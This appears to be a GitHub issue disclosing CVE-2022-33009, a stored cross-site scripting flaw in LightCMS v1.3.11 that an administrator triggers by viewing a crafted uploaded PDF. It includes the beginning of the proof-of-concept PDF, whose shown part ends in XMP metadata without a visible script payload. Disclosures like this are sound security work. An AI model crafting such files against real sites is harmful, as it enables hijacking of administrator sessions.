Headline
CVE-2022-33009: A stored cross-site scripting (XSS) vulnerability exists in LightCMS "contents" field · Issue #30 · eddy8/LightCMS
A stored cross-site scripting (XSS) vulnerability in LightCMS v1.3.11 allows attackers to execute arbitrary web scripts or HTML via uploading a crafted PDF file.
A stored cross-site scripting (XSS) vulnerability exists in LightCMS that allows an user authorized to upload a malicious .pdf file which acts as a stored XSS payload. If this stored XSS payload is triggered by an administrator it will trigger a XSS attack.
%PDF-1.4
%1111
1 0 obj
<<
/CreationDate (D:20210619104632+08'00')
/Creator (xss)
/Producer (PDF-XChange Core API SDK \(7.0.324.2\))
>>
endobj
2 0 obj
<<
/Metadata 3 0 R
/Pages 4 0 R
/Type /Catalog
>>
endobj
3 0 obj
<<
/Length 2983
/Subtype /XML
/Type /Metadata
>>
stream
<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="XMP Core 5.5.0">
<rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about=""
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/"
xmlns:xmp="http://ns.adobe.com/xap/1.0/"
xmlns:pdf="http://ns.adobe.com/pdf/1.3/">
<dc:format>application/pdf</dc:format>
<xmpMM:DocumentID>uuid:9c93bc08-8e4e-46cb-b28f-824c693821a4</xmpMM:DocumentID>
<xmpMM:InstanceID>uuid:2cd63bea-24ca-4ef8-a12c-015da3b28c96</xmpMM:InstanceID>
<xmp:CreateDate>2021-06-19T10:46:32+08:00</xmp:CreateDate>
<xmp:CreatorTool>迅捷PDF编辑器 7.0.324.2</xmp:CreatorTool>
<xmp:ModifyDate>2021-06-19T10:52:02+08:00</xmp:ModifyDate>
<pdf:Producer>PDF-XChange Core API SDK (7.0.324.2)</pdf:Producer>
</rdf:Description>
</rdf:RDF>
</x:xmpmeta>